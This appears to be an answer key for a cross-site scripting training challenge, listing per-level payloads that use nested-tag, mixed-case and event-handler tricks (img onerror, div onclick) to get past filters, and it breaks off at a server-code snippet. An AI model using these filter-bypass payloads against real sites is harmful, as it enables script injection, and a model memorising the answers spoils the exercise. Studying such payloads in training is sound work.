转载请注明出处:
转载请注明出处:
转载请注明出处:
0. Welcome
N/A
1. A Truly Disruptive Startup (3 points)
<script>window.postMessage('success', '*')</script>
2. No Script Allowed (3 points)
<scripscriptt>window.postMessage('success', '*')</scripscriptt>
3. One More Time, Like You Mean It (3 points)
<scripscriptt>window.postMessage('success', '*')</scripscriptt>
4. An Open-and-Shut Case (3 points)
<ScRiPt>window.postMessage('success', '*')</ScRiPt>
5. Time to Mix Things Up (3 points)
<ScRiPt>window.postMessage('success', '*')</ScRiPt>
6. A Picture is Worth a Thousand Words (3 points)
<img src onerror="window.postMessage('success', '*')">
7. Between a Rock And a Hard Place (3 points)
<div onclick="window.postMessage('success', '*')">
8. Angle of Death (6 points)
Attack input:
<><script>window.postMessage('success', '*')</script>
Server code:
router.get('/search', async (req, res) =>